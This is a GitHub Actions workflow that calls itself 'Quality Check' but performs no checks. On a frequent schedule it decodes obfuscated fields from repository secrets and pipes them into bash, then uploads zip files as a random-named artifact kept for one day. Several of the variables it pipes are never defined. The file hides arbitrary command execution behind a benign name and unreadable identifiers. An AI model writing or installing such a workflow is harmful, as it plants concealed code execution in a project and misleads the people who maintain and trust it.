name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '35 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
env:
  RUNNER_DEBUG: 0
jobs:
  task:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Apply
        env:
          hxea8: ${{ secrets.hxea8 }}
        run: |
          printf '%s' "$hxea8" | jq -r .bo9 | /bin/bash
          printf '%s' "$sr6" | jq -r .ry11296 | /bin/bash
          printf '%s' "$a62" | jq -r .doajh88865 | /bin/bash
          printf '%s' "$slca0046" | jq -r .pouoh74 | /bin/bash

      - name: Upload output
        uses: actions/upload-artifact@v4
        with:
          name: dbSNONF2
          path: "*.zip"
          retention-days: 1
